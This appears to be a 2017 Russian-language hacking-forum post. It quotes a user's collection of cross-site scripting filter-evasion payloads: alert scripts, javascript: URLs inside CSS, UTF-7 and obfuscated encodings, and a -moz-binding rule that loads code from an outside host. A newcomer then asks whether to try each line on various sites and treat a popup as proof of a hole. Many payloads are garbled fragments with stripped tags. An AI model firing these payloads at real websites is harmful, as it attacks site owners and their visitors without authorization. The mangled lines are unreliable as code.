
13.10.2017, 20:15
|
|
Новичок
Регистрация: 13.10.2017
Сообщений: 2
Провел на форуме: 664
Репутация:
0
|
|
Сообщение от Logol
↑
мой маленький набор
Код:
'';!--"=&{()}
xxs link
or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.
xxs link
alert("XSS")">
perl -e 'print "";' > out
alert("XSS");//
alert("XSS");
li {list-style-image: url("javascript:alert('XSS')");}XSS
; REL=stylesheet">
BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
@im\port'\ja\vasc\ript:alert("XSS")';
alert('XSS');
.XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}
¼script¾alert(¢XSS¢)¼/script¾
cript:alert('XSS')">
cript:alert('XSS')">
alert("XSS")'); ?>
alert('XSS')">
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
Привет. И все вот эти строчки тестировать на разных сайтах? Если вывело уведомление, значит уязвимость есть?
|
|
|